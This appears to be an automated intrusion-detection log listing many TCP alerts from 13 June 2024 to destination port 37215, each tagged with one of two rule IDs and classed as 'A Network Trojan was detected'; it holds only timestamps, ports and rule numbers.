              Timestamp:06/13/24-21:32:28.048639
              SID:2835222
              Source Port:38988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407550
              SID:2835222
              Source Port:47746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424169
              SID:2829579
              Source Port:41782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476499
              SID:2829579
              Source Port:43768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223541
              SID:2829579
              Source Port:59768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417705
              SID:2829579
              Source Port:44338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087701
              SID:2835222
              Source Port:48398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135882
              SID:2829579
              Source Port:47372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098272
              SID:2835222
              Source Port:36974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886337
              SID:2835222
              Source Port:42242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231198
              SID:2829579
              Source Port:43894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307011
              SID:2829579
              Source Port:43708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212610
              SID:2835222
              Source Port:54384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727038
              SID:2835222
              Source Port:33622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831365
              SID:2835222
              Source Port:39198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353646
              SID:2835222
              Source Port:60836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.968166
              SID:2829579
              Source Port:57098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992877
              SID:2829579
              Source Port:51570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486222
              SID:2829579
              Source Port:37584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871701
              SID:2835222
              Source Port:46306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271494
              SID:2835222
              Source Port:57188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.489092
              SID:2835222
              Source Port:44024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258327
              SID:2835222
              Source Port:51872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569291
              SID:2835222
              Source Port:41938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525694
              SID:2835222
              Source Port:34306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488358
              SID:2829579
              Source Port:44184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839246
              SID:2829579
              Source Port:60964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953850
              SID:2835222
              Source Port:52502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754492
              SID:2829579
              Source Port:58754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731057
              SID:2829579
              Source Port:51600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677650
              SID:2835222
              Source Port:53134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885827
              SID:2829579
              Source Port:32810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300652
              SID:2835222
              Source Port:37314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092573
              SID:2835222
              Source Port:47366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174184
              SID:2829579
              Source Port:58328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543522
              SID:2835222
              Source Port:33432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100366
              SID:2829579
              Source Port:52544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438684
              SID:2829579
              Source Port:42234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373151
              SID:2835222
              Source Port:47490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938004
              SID:2835222
              Source Port:57028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302218
              SID:2829579
              Source Port:50262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749720
              SID:2829579
              Source Port:42608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156742
              SID:2829579
              Source Port:51510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076929
              SID:2835222
              Source Port:34634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450544
              SID:2829579
              Source Port:33740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264683
              SID:2829579
              Source Port:36984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754448
              SID:2835222
              Source Port:50722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108699
              SID:2835222
              Source Port:44060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305407
              SID:2829579
              Source Port:34994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658553
              SID:2829579
              Source Port:40742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785930
              SID:2835222
              Source Port:34324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506316
              SID:2829579
              Source Port:33166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348739
              SID:2835222
              Source Port:59100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245997
              SID:2835222
              Source Port:59896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.936964
              SID:2829579
              Source Port:55714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451858
              SID:2829579
              Source Port:49860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833161
              SID:2829579
              Source Port:40050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759283
              SID:2835222
              Source Port:54552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403749
              SID:2835222
              Source Port:58508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487941
              SID:2829579
              Source Port:56432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243768
              SID:2829579
              Source Port:53234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676063
              SID:2835222
              Source Port:47536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992967
              SID:2829579
              Source Port:47512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079476
              SID:2835222
              Source Port:38468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279997
              SID:2829579
              Source Port:39998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028368
              SID:2835222
              Source Port:54226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197023
              SID:2835222
              Source Port:59222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870521
              SID:2829579
              Source Port:46150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175094
              SID:2835222
              Source Port:60174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677612
              SID:2829579
              Source Port:36882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975543
              SID:2829579
              Source Port:36318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790064
              SID:2829579
              Source Port:45452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710249
              SID:2835222
              Source Port:55544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564832
              SID:2835222
              Source Port:35720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457263
              SID:2835222
              Source Port:60254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726513
              SID:2835222
              Source Port:52280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130334
              SID:2835222
              Source Port:38030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028599
              SID:2835222
              Source Port:53448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074942
              SID:2829579
              Source Port:58692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669910
              SID:2835222
              Source Port:40556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754428
              SID:2829579
              Source Port:54348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200085
              SID:2829579
              Source Port:55312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298661
              SID:2835222
              Source Port:59464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419770
              SID:2829579
              Source Port:52232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836451
              SID:2835222
              Source Port:54244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200030
              SID:2835222
              Source Port:48302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488142
              SID:2835222
              Source Port:48172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294930
              SID:2835222
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230640
              SID:2835222
              Source Port:39550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417303
              SID:2829579
              Source Port:60044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423709
              SID:2835222
              Source Port:57782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078696
              SID:2829579
              Source Port:53052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272082
              SID:2829579
              Source Port:50220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157583
              SID:2835222
              Source Port:40684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402026
              SID:2835222
              Source Port:60434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110176
              SID:2829579
              Source Port:37636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376476
              SID:2829579
              Source Port:52076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824653
              SID:2835222
              Source Port:58128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670292
              SID:2835222
              Source Port:52796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092025
              SID:2829579
              Source Port:59520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456477
              SID:2829579
              Source Port:46660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954075
              SID:2835222
              Source Port:47940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307175
              SID:2835222
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569829
              SID:2835222
              Source Port:45878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820399
              SID:2835222
              Source Port:36920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277570
              SID:2835222
              Source Port:46280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419740
              SID:2835222
              Source Port:46796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.198959
              SID:2835222
              Source Port:41724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244019
              SID:2835222
              Source Port:38134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457919
              SID:2829579
              Source Port:40672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369294
              SID:2835222
              Source Port:42338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480708
              SID:2829579
              Source Port:53310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301254
              SID:2829579
              Source Port:40164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156383
              SID:2835222
              Source Port:40492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439760
              SID:2835222
              Source Port:44098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629832
              SID:2835222
              Source Port:35912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026608
              SID:2829579
              Source Port:59692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912335
              SID:2835222
              Source Port:34404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502341
              SID:2835222
              Source Port:51210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217933
              SID:2835222
              Source Port:49630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632280
              SID:2835222
              Source Port:45686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013829
              SID:2835222
              Source Port:47684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973096
              SID:2835222
              Source Port:40406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405193
              SID:2829579
              Source Port:42950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248105
              SID:2829579
              Source Port:41300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991222
              SID:2835222
              Source Port:48296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554537
              SID:2835222
              Source Port:47208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913915
              SID:2835222
              Source Port:56494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678607
              SID:2829579
              Source Port:41894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077165
              SID:2835222
              Source Port:52446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028182
              SID:2829579
              Source Port:33716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212974
              SID:2835222
              Source Port:48308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749903
              SID:2829579
              Source Port:53688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782947
              SID:2835222
              Source Port:59442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306653
              SID:2835222
              Source Port:43810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670885
              SID:2835222
              Source Port:55372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347232
              SID:2829579
              Source Port:39070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997247
              SID:2835222
              Source Port:34688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168653
              SID:2835222
              Source Port:57182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027456
              SID:2835222
              Source Port:36838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842528
              SID:2835222
              Source Port:37326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123925
              SID:2835222
              Source Port:56048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239090
              SID:2829579
              Source Port:42574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151338
              SID:2835222
              Source Port:36900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128142
              SID:2835222
              Source Port:42874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056296
              SID:2835222
              Source Port:59116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244358
              SID:2835222
              Source Port:35992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478035
              SID:2829579
              Source Port:35536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.931531
              SID:2829579
              Source Port:44224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096157
              SID:2835222
              Source Port:49026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308656
              SID:2829579
              Source Port:54526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697511
              SID:2829579
              Source Port:56726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417599
              SID:2829579
              Source Port:45194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758278
              SID:2835222
              Source Port:59360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211605
              SID:2835222
              Source Port:52700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266072
              SID:2829579
              Source Port:60366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170166
              SID:2829579
              Source Port:43062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195157
              SID:2829579
              Source Port:46130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370139
              SID:2835222
              Source Port:38998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155826
              SID:2835222
              Source Port:57780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.368643
              SID:2835222
              Source Port:33434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.305415
              SID:2829579
              Source Port:48658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438975
              SID:2829579
              Source Port:35912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972681
              SID:2835222
              Source Port:42786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218047
              SID:2829579
              Source Port:52002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454337
              SID:2829579
              Source Port:56910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702601
              SID:2835222
              Source Port:33884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318019
              SID:2835222
              Source Port:56016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438234
              SID:2835222
              Source Port:54872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038066
              SID:2829579
              Source Port:58226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253144
              SID:2835222
              Source Port:49812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248161
              SID:2835222
              Source Port:35220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257154
              SID:2835222
              Source Port:43064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989071
              SID:2829579
              Source Port:43500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274137
              SID:2829579
              Source Port:43766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406629
              SID:2829579
              Source Port:58732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307359
              SID:2829579
              Source Port:38642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125028
              SID:2829579
              Source Port:50610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356406
              SID:2835222
              Source Port:49404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323092
              SID:2835222
              Source Port:60252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317164
              SID:2829579
              Source Port:56812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835140
              SID:2829579
              Source Port:60576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102374
              SID:2829579
              Source Port:43524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783923
              SID:2829579
              Source Port:34626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301740
              SID:2835222
              Source Port:49444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510279
              SID:2829579
              Source Port:37200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972068
              SID:2835222
              Source Port:38314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456601
              SID:2835222
              Source Port:51142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631476
              SID:2835222
              Source Port:58866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088106
              SID:2835222
              Source Port:33410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889242
              SID:2829579
              Source Port:54620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025922
              SID:2829579
              Source Port:40336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991779
              SID:2829579
              Source Port:52936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246747
              SID:2829579
              Source Port:33732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355202
              SID:2835222
              Source Port:50232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437328
              SID:2829579
              Source Port:39378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757649
              SID:2835222
              Source Port:50576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909011
